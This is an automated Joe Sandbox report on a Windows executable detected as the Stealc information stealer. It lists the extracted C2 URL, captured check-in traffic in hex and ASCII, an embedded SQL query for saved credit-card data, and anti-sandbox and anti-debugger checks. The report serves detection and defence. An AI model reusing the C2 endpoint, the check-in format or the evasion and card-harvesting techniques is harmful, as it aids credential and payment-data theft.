Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532741
MD5:054dffcd797e0e40c9e7b3050814f148
SHA1:d5d545a246bb31a238e4a2632bdc878a35bd8d7e
SHA256:6dbfc677cbb25ac652a97431f9afc4811639b3dae9b640976c0b9bb8d9a54404
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 054DFFCD797E0E40C9E7B3050814F148)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4392JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4392JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.5c0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T21:04:08.967465+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.5c0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_005CC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_005C7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_005C9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_005C9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005D8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_005D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005C16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_005D3EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_005C4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--
                Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpuL
                Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37L

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F0270_2_0090F027
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D50_2_0098E1D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009969690_2_00996969
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009932C90_2_009932C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A13A090_2_00A13A09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00908BEA0_2_00908BEA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098AC3B0_2_0098AC3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BC4340_2_008BC434
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FDC300_2_008FDC30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098FC590_2_0098FC59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099847F0_2_0099847F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00994DBC0_2_00994DBC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F8DF40_2_008F8DF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C1EA60_2_008C1EA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096DE1D0_2_0096DE1D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098C74C0_2_0098C74C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099177F0_2_0099177F
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005C45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: yhphlozs ZLIB complexity 0.9949685097603256
                Source: file.exe, 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_005D9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_005D3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EHI8I06B.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsr?;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1854976 > 1048576
                Source: file.exeStatic PE information: Raw size of yhphlozs is bigger than: 0x100000 < 0x19ea00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.5c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005D9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cdfff should be: 0x1d161e
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: yhphlozs
                Source: file.exeStatic PE information: section name: rdjojuwm
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CC0CE push edx; mov dword ptr [esp], esp0_2_009CC10B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A138F2 push 71AE9534h; mov dword ptr [esp], ecx0_2_00A1391A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB035 push ecx; ret 0_2_005DB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A758CE push 680F0635h; mov dword ptr [esp], esp0_2_00A758D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A758CE push 5B8C78D7h; mov dword ptr [esp], eax0_2_00A75FD2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F027 push edi; mov dword ptr [esp], ebx0_2_0090F0B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F027 push ebp; mov dword ptr [esp], 5FDFE3EEh0_2_0090F174
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F027 push 69B550A1h; mov dword ptr [esp], ebx0_2_0090F1A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F027 push 1350B330h; mov dword ptr [esp], edx0_2_0090F26E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F027 push 514680F2h; mov dword ptr [esp], eax0_2_0090F2A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F027 push 395FF5D2h; mov dword ptr [esp], edx0_2_0090F2B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D4840 push ebx; mov dword ptr [esp], 123D5D00h0_2_009D484C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BE07D push 4E27B35Bh; mov dword ptr [esp], eax0_2_009BE092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BE07D push ebp; mov dword ptr [esp], edx0_2_009BE0E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A33852 push edi; mov dword ptr [esp], 02C24316h0_2_00A33856
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A33852 push eax; mov dword ptr [esp], edx0_2_00A33981
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C718F push ecx; mov dword ptr [esp], eax0_2_008C723B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C718F push esi; mov dword ptr [esp], 64AEEE82h0_2_008C727F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C718F push ecx; mov dword ptr [esp], edx0_2_008C7310
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C718F push ebx; mov dword ptr [esp], ebp0_2_008C7314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2C98D push 6AC2D9FCh; mov dword ptr [esp], ebx0_2_00A2C9B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2C98D push 5FD3D891h; mov dword ptr [esp], ecx0_2_00A2C9BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A069EC push esi; mov dword ptr [esp], ecx0_2_00A06A56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push edx; mov dword ptr [esp], ecx0_2_0098E1DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push esi; mov dword ptr [esp], ecx0_2_0098E214
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push eax; mov dword ptr [esp], 4C97D83Ah0_2_0098E23E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push ebx; mov dword ptr [esp], 17851D7Dh0_2_0098E2CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push 1DCB9CECh; mov dword ptr [esp], esi0_2_0098E316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push ecx; mov dword ptr [esp], ebp0_2_0098E391
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push eax; mov dword ptr [esp], edi0_2_0098E3B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E1D5 push 172EDC16h; mov dword ptr [esp], ecx0_2_0098E402
                Source: file.exeStatic PE information: section name: yhphlozs entropy: 7.95378057749378

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005D9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13365
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C546 second address: 99C55E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7F147AEA4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C7FE second address: 99C804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C804 second address: 99C809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CAFB second address: 99CB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB01 second address: 99CB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB05 second address: 99CB3B instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7F1511CE2Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 jp 00007F7F1511CE26h 0x0000001f jmp 00007F7F1511CE36h 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0713 second address: 9A0719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0719 second address: 9A071E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
